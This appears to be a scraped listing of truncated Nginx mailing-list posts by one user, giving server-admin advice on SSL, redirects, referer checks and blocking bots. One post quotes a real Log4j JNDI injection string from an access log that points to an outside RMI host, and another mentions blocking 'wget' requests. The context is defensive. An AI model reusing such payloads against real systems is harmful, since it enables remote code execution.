I am presently using a scheme like this to prevent scraping documents. ************************************ location /images/ { valid_referers none blocked www.example.com example.com forums.othersite.com ; # you can tell the browser that it can only download content from the domains you explicitly allow # if ($invalid_referer) { # return 403; if ($by gariac - Nginx Mailing List - English
You can inspect the certificate at https://www.ssllabs.com/ssltest/ Maybe you will get lucky and it will help you find out what is wrong. Original Message From: softwareinfojam@gmail.com Sent: December 14, 2022 7:02 PM To: nginx@nginx.org Reply-to: nginx@nginx.org Subject: Certificate Error Hi All, I would really appreciate some help with this sticky problem. I am using nginx aby gariac - Nginx Mailing List - English
On Mon, 20 Jun 2022 17:23:23 -0400 "_lukman_" <nginx-forum@forum.nginx.org> wrote: > server > { > listen 443 default_server ssl; > listen [::]:443 ssl http2; > server_name dummysite.io www.dummysite.io; > ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; # > managed by Certbot > ssl_certificate_key > /etc/letsencrypt/live/dby gariac - Nginx Mailing List - English
Isn't Openssl part of your OS? Original Message From: nginx-forum@forum.nginx.org Sent: March 26, 2022 11:07 PM To: nginx@nginx.org Reply-to: nginx@nginx.org Subject: Nginx with OpenSSL 1.1.1n The Mainline version of Nginx i.e 1.12.6 has the OpenSSL version 1.1.1m and it is vulnerable. Is there any plan to release another version of Nginx with the latest OpenSSL(i.e 1.1.1n)? Posby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list -- nginx@nginx.org To unsubscribe send an email to nginx-leave@nginx.orgby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list -- nginx@nginx.org To unsubscribe send an email to nginx-leave@nginx.orgby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list -- nginx@nginx.org To unsubscribe send an email to nginx-leave@nginx.orgby gariac - Nginx Mailing List - English
Being that you are using Opensuse I think the answer is no but do you SELINUX enabled? Usually when a file permission doesn't solve the problem for me then it is some "policy" feature I don't know about. I do the file 777 permission during testing to debug something but I can't think of a case when it ever was the right solution. Original Message From: nginx-forum@forby gariac - Nginx Mailing List - English
This is the list of effected programs. https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md Original Message From: maxim@nginx.com Sent: December 29, 2021 11:21 PM To: mauro.tridici@cmcc.it Reply-to: nginx@nginx.org Cc: nginx@nginx.org Subject: Re: Help request about Log4j attack attempts and NGINX logs meaning Mauro, Unless you use somewhere in your stack lby gariac - Nginx Mailing List - English
"get" is a html verb also known as method. Most URL requests are gets. https://www.w3schools.com/tags/ref_httpmethods.asp https://nordicapis.com/ultimate-guide-to-all-9-standard-http-methods/ I just know the bare essentials and have web pages that look like the 90's era other than using a little HTML5. Having never used "parameters" I couldn't completely answer your initby gariac - Nginx Mailing List - English
That IP space is certified shady. I detect the occasional hack from them. See https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ and https://wirelessdataspco.org/faq.php These wireless companies will do anything for money including leasing their IP space. I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actualby gariac - Nginx Mailing List - English
On Mon, 20 Dec 2021 17:49:48 +0000 Jay Caines-Gooby <jay@gooby.org> wrote: > The request is for your index page "GET / HTTP/1.1"; that's why your > server responded with 200 OK. The special characters are in the > referer and user-agent fields, as a log4j system would also try to > interpolate these, and thus be vulnerable to the exploit. > > On Mon, 20 Dec 2021by gariac - Nginx Mailing List - English
I don't have any service using java so I don't believe I am subject to this exploit. Howerver I am confused why a returned a 200 for this request. The special characters in the URL are confusing. 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196by gariac - Nginx Mailing List - English
If you follow the suggested link in the previous post you can download an O'Reilly Nginx book. One suggestion I have to improve performance is to firewall off all the 'bots. Firewalls are extremely efficient. Start with AWS: https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html Bots are half the internet traffic, but that includes both bad and good bots. If you are handy with bgp.he.by gariac - Nginx Mailing List - English
I insist on encryption so this is what I use: server { listen 80; server_name yourdomain.com www.yourdomain.com ; if ($request_method !~ ^(GET|HEAD)$ ) { return 444; } return 301 https://$host$request_uri; } I only serve static pages so I use that filter. Obviously that is optional. But basically every unencrypted request to 80 is mapped to aby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
My VPS is on digital Ocean. Oh and I block them too. And Linode. I am an equal opportunity blocker. Google is a little tricky to find the IP space. Remember you don't want to block Google search. In fact you should create an account with Google to help them find your website. The suggested method is to get the IP space from their SPF. https://support.symphony.com/hc/en-us/articles/360029563832-Oby gariac - Nginx Mailing List - English
I can't find it, but someone wrote a script to decode that style of hacking. For the hacks I was decoding, they were RDP hack attempts. The hackers just "spray" their attacks. Often they are not meaningful to your server. I have Nginx maps set up to match requests that are not relevant to my server. For instance I don't run WordPress, so anything WordPress related gets a 444 response. Oby gariac - Nginx Mailing List - English
In theory not a problem, but look at the text on this page about placing root in location blocks. https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/ I saw your first post and thought it was entertaining. Somebody needs to annoy those hackers. Since I don't use php I trap those requests in a map and return a 444. That way I can use some scripts and pull the hacker IPs ouby gariac - Nginx Mailing List - English
That clears it up. Most of what I see in the error log is stuff I have no idea how to fix. I will Google some errors and see what is fixable. The deal is my websites work for me and I get no complaints. Reading questions on the interwebs, most people get error messages when they use curl on their website. Now I never saw a post where someone intentionally causes an error with curl, but why not.by gariac - Nginx Mailing List - English
I'm not sure I understand the question, but how does this sound? I use a map to catch requests that I don't want. For instance I return a 444 if I receive a "wget". Original Message From: c@tunnel53.net Sent: June 14, 2020 5:40 AM To: nginx@nginx.org Reply-to: nginx@nginx.org Subject: Force Nginx to log error? Hi folks, Is there any surefire way to force Nginx to log aby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
Wouldn't it be less work to set up subdomains and handle this with DNS? I for one will never qualify for this T shirt. https://store.xkcd.com/products/i-know-regular-expressions Original Message From: paul@stormy.ca Sent: April 14, 2020 1:39 PM To: nginx@nginx.org Reply-to: nginx@nginx.org Subject: Rewrite -- failure New to this list (lurked for a couple of weeks), so hope you'llby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
Answers intermixed below. On Wed, 11 Mar 2020 21:23:15 -0400 "MAXMAXarena" <nginx-forum@forum.nginx.org> wrote: > Hello @Ralph Seichter, > what do you mean by "mutually exclusive"? > As for the tools I mentioned, it was just an example. > Are you telling me I can't solve this problem? > > > Hello @garic, > thanks for this answer, it made me undby gariac - Nginx Mailing List - English
You could make it harder to pass around the URL if it is dynamic. That is make the url session related. You can do a search on "uncrawlable" and then exactly the opposite of what they suggest. That is most people want to be crawled, so their advice is backwards. One thing to watch out for is Google dorking. Even if Google doesn't crawl, the html/javascript/etc leave clues to file locby gariac - Nginx Mailing List - English
If you are going to block one thing, eventually you will block two, then three, etc. I suggest learning how to use "map". https://www.edmondscommerce.co.uk/handbook/Servers/Config/Nginx/Blocking-URLs-in-batch-using-nginx-map/ Original Message From: nginx-forum@forum.nginx.org Sent: February 6, 2020 3:03 PM To: nginx@nginx.org Reply-to: nginx@nginx.org Subject: Re: Nginby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English